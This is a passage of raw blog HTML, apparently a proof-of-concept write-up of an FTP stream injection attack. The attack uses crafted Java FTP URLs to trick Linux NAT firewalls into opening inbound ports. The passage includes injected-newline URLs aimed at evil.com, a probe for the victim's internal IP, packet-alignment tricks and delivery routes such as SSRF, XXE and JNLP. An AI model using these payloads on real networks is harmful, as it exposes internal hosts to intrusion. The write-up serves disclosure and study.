class=\"crayon-st\">In<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">our <\/span><span class=\"crayon-e\">version <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">attack<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">no <\/span><span class=\"crayon-e\">Java <\/span><span class=\"crayon-e\">applet <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">required<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448595165230146-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448595165230146-5\"><span class=\"crayon-st\">In<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">simple <\/span><span class=\"crayon-e\">version <\/span><span class=\"crayon-e\">of <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">attack<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we <\/span><span class=\"crayon-e\">could <\/span><span class=\"crayon-e\">simply <\/span><span class=\"crayon-i\">inject<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">malicious<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">PORT<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">command <\/span><span class=\"crayon-e\">into <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">stream <\/span><span class=\"crayon-e\">at <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">right <\/span><span class=\"crayon-v\">moment<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">When <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">firewall <\/span><span class=\"crayon-e\">sees <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-e\">will <\/span><span class=\"crayon-e\">translate <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">internal <\/span><span class=\"crayon-e\">IP <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">port <\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">command <\/span><span class=\"crayon-e\">into <\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">external <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">then<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">enable<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">temporary<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">NAT<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rule <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">allow<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">single <\/span><span class=\"crayon-e\">TCP <\/span><span class=\"crayon-e\">connection <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">come <\/span><span class=\"crayon-e\">back <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">relaying <\/span><span class=\"crayon-e\">it <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">client<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448595165230146-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448595165230146-7\"><span class=\"crayon-e\">Suppose <\/span><span class=\"crayon-e\">that <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">victim <\/span><span class=\"crayon-e\">Java <\/span><span class=\"crayon-e\">client <\/span><span class=\"crayon-e\">host <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">10.1.2.3<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">victim <\/span><span class=\"crayon-e\">firewall <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-e\">an <\/span><span class=\"crayon-e\">external <\/span><span class=\"crayon-e\">IP <\/span><span class=\"crayon-e\">address <\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">8.14.14.15<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">our <\/span><span class=\"crayon-e\">attacker <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">evil<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">com<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">em<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">Then<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we <\/span><span class=\"crayon-e\">should <\/span><span class=\"crayon-e\">expect <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FTP <\/span><span class=\"crayon-e\">URL <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fool <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">firewall <\/span><span class=\"crayon-e\">into <\/span><span class=\"crayon-e\">opening <\/span><span class=\"crayon-e\">up <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2000<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0037 seconds] -->  <\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448598243831085\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ftp:\/\/x:y@evil.com\/bogus-directory%0APORT%2010,1,2,3,7,208\/z.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448598243831085-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448598243831085-1\"><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@evil.com\/bogus-directory%0APORT%2010,1,2,3,7,208\/z.txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p><strong>Opening Ports in the Firewall Attack Scenario Proof of Concept<\/strong><\/p>\n<p><u>First Challenge: Determining Internal IP<\/u><br \/> In this scenario, the attacker needs to know the victim&#8217;s internal IP address. The attacker can send a prob URL, see how the client behaves, then try another until the attack is successful (Only 2-3 attempts should be required).<\/p>\n<p>As for the first phase of the attack, the attacker can simply supply the victim with an FTP URL that points to an unusual port on the attacker&#8217;s server, such as:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce44859a343340758\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  ftp:\/\/x:y@evil.com:1337\/bogus-directory\/z.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859a343340758-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce44859a343340758-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@evil.com:1337\/bogus-directory\/z.txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>Assuming the attacker&#8217;s server rejects any passive commands, the Java client will fall back to using classic non-passive modes. When the client sends the <em>PORT<\/em> command, it is unlikely this will be translated by the victim&#8217;s firewall, since it is on an unusual port. That means the client will be handing the attacker it&#8217;s internal IP address.<\/p>\n<p><u>Second Challenge: Packet Alignment<\/u><\/p>\n<p>FTP is designed as a synchronous, line-based protocol where each side of the communication writes one line and waits for a response from the other side before continuing. That means neither side of the communication should write more than one command before waiting for the other to respond.<\/p>\n<p>The Linux conntrack firewall modules take advantage of this fact to try and be extra sure that they really are seeing a <em>PORT<\/em> command on the wire. They implement this by requiring any <em>PORT<\/em> command to appear at the very beginning of the packet. Therefore, the URL (shown earlier) doesn&#8217;t actually cause Linux firewalls to open up the desired port:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce44859d502221627\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ftp:\/\/x:y@evil.com\/bogus-directory%0APORT%2010,1,2,3,7,208\/z.txt<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859d502221627-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce44859d502221627-1\"><span class=\"crayon-v\">ftp<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/x:y@evil.com\/bogus-directory%0APORT%2010,1,2,3,7,208\/z.txt<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>If you carefully observe the packet trace of the above URL being fetched, you&#8217;d see commands sent by the client coming in the following individual packets:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce44859f222872977\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8211;Begin Packet 1&#8211;  USER x  &#8211;Begin Packet 2&#8211;  PASS y  &#8211;Begin Packet 3&#8211;  TYPE I  &#8211;Begin Packet 4&#8211;  CWD bogus-directory  PORT 10,1,2,3,7,208  &#8211;Begin Packet 5&#8211;  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859f222872977-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44859f222872977-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859f222872977-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44859f222872977-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859f222872977-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44859f222872977-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859f222872977-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44859f222872977-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859f222872977-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce44859f222872977-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44859f222872977-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce44859f222872977-1\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">Begin <\/span><span class=\"crayon-i\">Packet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44859f222872977-2\"><span class=\"crayon-i\">USER<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44859f222872977-3\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">Begin <\/span><span class=\"crayon-i\">Packet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44859f222872977-4\"><span class=\"crayon-i\">PASS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44859f222872977-5\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">Begin <\/span><span class=\"crayon-i\">Packet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44859f222872977-6\"><span class=\"crayon-i\">TYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">I<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44859f222872977-7\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">Begin <\/span><span class=\"crayon-i\">Packet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44859f222872977-8\"><span class=\"crayon-e\">CWD <\/span><span class=\"crayon-v\">bogus<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">directory<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44859f222872977-9\"><span class=\"crayon-i\">PORT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">208<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44859f222872977-10\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">Begin <\/span><span class=\"crayon-i\">Packet<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44859f222872977-11\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p>Since the <em>PORT<\/em> command comes in the middle of Packet 4, Linux ignores it.<\/p>\n<p>To force the client to send the <em>PORT<\/em> command at the very beginning of a packet, even though two commands were sent in a single write, we will use CWD command with directory name that is long enough that it exactly filled up one TCP packet, Then &#8220;<em>PORT&#8230;<\/em>&#8221; would be forced to start at the very next packet.<\/p>\n<p>There are several difficulties to exploiting this vulnerability, MTU size may be high, Java application may complain about receiving a very long URL. To overcome this, we can simply force the FTP session&#8217;s TCP connection to use the minimum MTU size, since we control the malicious FTP server. Linux firewall rules can be use to clamp the <em>MSS<\/em> to <em>536 bytes<\/em>, which makes our malicious URLs much easier to calculate. <\/p>\n<p><u>Getting Java our URLs<\/u><\/p>\n<p>There are a variety of situations where we could convince a Java application to fetch our URLs, which we discuss briefly here.<\/p>\n<ol>\n<li><u>SSRF<\/u>: If an application accepts any <em>HTTP<\/em>, <em>HTTPS<\/em>, or <em>FTP URL<\/em>, then exploitation is straight-forward.  Even if the application accepts only <em>HTTPS<\/em> or <em>HTTP<\/em> URLs due to naive input validation, then an attacker could simply redirect to a malicious FTP URL. <\/li>\n<li><u>XXE<\/u>: Most XXE bugs yield SSRF like access, so this is pretty straight forward.  Note that some XXE vulnerabilities aren&#8217;t very practical to exploit due to XML parser settings, preventing classic entity attacks. However, in some of these cases SSRF is still possible.<\/li>\n<li><u>Man-in-the-Middle:<\/u> If a Java application is fetching any HTTP URL, then a privileged network attacker could inject a redirect to bootstrap this attack.<\/li>\n<li><u>JNLP Files:<\/u> If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java to parse a JNLP file.  These files could contain malicious FTP URLs which trigger this bug.  A clever attacker could weaponize the exploit to determine the victim&#8217;s internal IP address, determine the appropriate packet alignment, and then exploit the bug all in one shot. Many ports could be opened at once, potentially.  I have not tried this, but it should be possible with a clever implementation.<\/li>\n<\/ol>\n<p><u>General Setup<\/u><br \/> Set up 3 systems, each running Debian Linux.  One system is the external attacker server (EAS), another is the victim firewall (VF), and the third is the victim target (VT). They should be arranged in a very simple configuration like this: <\/p>\n<p>EAS &#8212;&#8211; VF &#8212;&#8211; VT<\/p>\n<p>For the purposes of this document, let&#8217;s assume these hosts have the following IP addresses:<\/p>\n<ol>\n<li>EAS: 1.3.3.7<\/li>\n<li>VF: 8.14.14.15<\/li>\n<li>VT: 10.1.2.3<\/li>\n<\/ol>\n<p><u>Victim Firewall (VF) Setup<\/u><br \/> Victim Firewall (VF) will need to be configured with a NAT firewall:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce4485a3995303682\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" 